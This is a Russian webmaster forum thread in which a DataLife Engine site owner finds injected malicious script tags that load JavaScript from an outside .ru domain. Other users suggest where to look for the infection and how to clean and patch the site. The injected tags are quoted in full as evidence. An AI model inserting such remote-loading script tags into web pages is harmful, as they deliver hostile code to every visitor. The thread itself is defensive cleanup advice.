Посторонний скрипт в DLE
Страницы: 1
Посторонний скрипт в DLE
Здравствуйте!
Вот увидел в Яндекс Вебмастере что на сайте обнаружен вредоносный код, так вот зашёл на свой сайт и действительно он там оказался.

Код
<script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/b93a29e4fa41e0c27d1d89fc94ec24b6.js?in">
</script><script async="async" type="text/javascript" src="http://bhq6bimdfwwo857xdurp.ru/896c62ef496dc5a210eb846c4ef4c5d8.js?in"></script>


Где можно его поискать? Вылазит он в краткой новости и в полной новости, после текста. Изменения явно в файлах движка, но вот отыскать его не удалось. Может кто посоветует... Заранее благодарен!
p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.
ищите по фтп или как удобно (через хостера) файлы с недавней датой изменения.
также помогает поиск строки кода, в частности http://bhq6bim
часто делают инекцию в каталоги \engine\modules или \ engine\inc 
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
очень может, надо искать дырку и латать
Цитата
killer1000 пишет:
А всё нашёл. Засрали всю БД. Кто знает если я просто всё почищу это не повториться заново?
Где нашел? У меня такая же гадость появилась. Ничего не нахожу ни в файлах движка, ни в базе..
сперва пароль от фтп смените... а потом разбирайтесь со скриптами
проблема явно в .js
Это шеллы, их вливают через уязвимости в ДЛЕ. Советую обратиться к автору этого топика: www.cy-pr.com/forum/f80/t55113/
Если код в статье, то это в БД. При наличии свежей версии достаточно сделать перестроение публикаций в админке и из новостей код удалится. так же надо проверить файлы, в которых может быть вредоносный код:
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php
Обязательно сменить все пароли (к БД, фтп, админка) и установить патчи безопасность в зависимости от версии скрипта, с оффсайта. Если стоит нулл, менять на "чистую" версию скрипта.
Цитата
ориться зан
>p.s. в файлах конфиг.пхп и бдконфиг.пхп посмотрел.Причем тут эти файлы? Если получили доступ к бд значит дырка на хостинге, а туда могли попасть через взлом фтп. 
Закрыть дырки надо, на оф. сайте заплатки лежат, была такая же херня, доступ был получен из кеша базы, что-то в этом роде.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:54 Заказал "положить сайт" а положили тебя? Полиция добралась до клиентов DDoS-сервисов 
15:36 Скан глаза для Zoom и Tinder + ап Яндекса 21 апреля. К этому реально всё идёт? 
15:31 Штрафы за крипту до 2 млн + ап Яндекса 19 апреля - что опять поменяли и куда всё катится? 
15:02 Claude по паспорту + апдейт Яндекса 17 апреля - у кого что по выдаче 
14:46 В Яндексе позиции держатся, а трафик проседает - стало заметно сильнее 
17:05 ИКС Яндекс АПдейт 1 апреля 2026. Обновлён алгоритм расчёта 
16:58 Ап выдачи Яндекса 8 апреля - есть движение, но интереснее что творится с AI-ответами Google 
14:52 Прошу оценить сайт 
13:56 Owlchange.com — сервис обмена криптовалют с выплатами в фиат 
13:39 Вериф аккаунты АВИТО + платежи 
10:26 Мониторинг обменников Сrypto-scout.io 
09:13 Monitex: Мониторинг с кэшбэком 80% в USDT 
05:09 От $0.015 за IP | $0.68 за ГБ | 9PROXY.COM | 20+ млн резидентных прокси | 99,95% аптайм | Без чёрных списков 
23:49 GoodsMoney.io 
14:49 Список обновленных тем пуст... 
11:21 ЕС сделал проверку возраста, а её уже ломают за минуты. Серьёзно? 
19:57 Во Франции начали штрафовать за IPTV - до 300-400 евро уже прилетает обычным пользователям 
17:02 арбитражники 
12:26 Заработок на загрузочном сайте в 2026? 
09:49 Точные прогнозы на футбол 
02:22 Ставки на супер тренды в спорте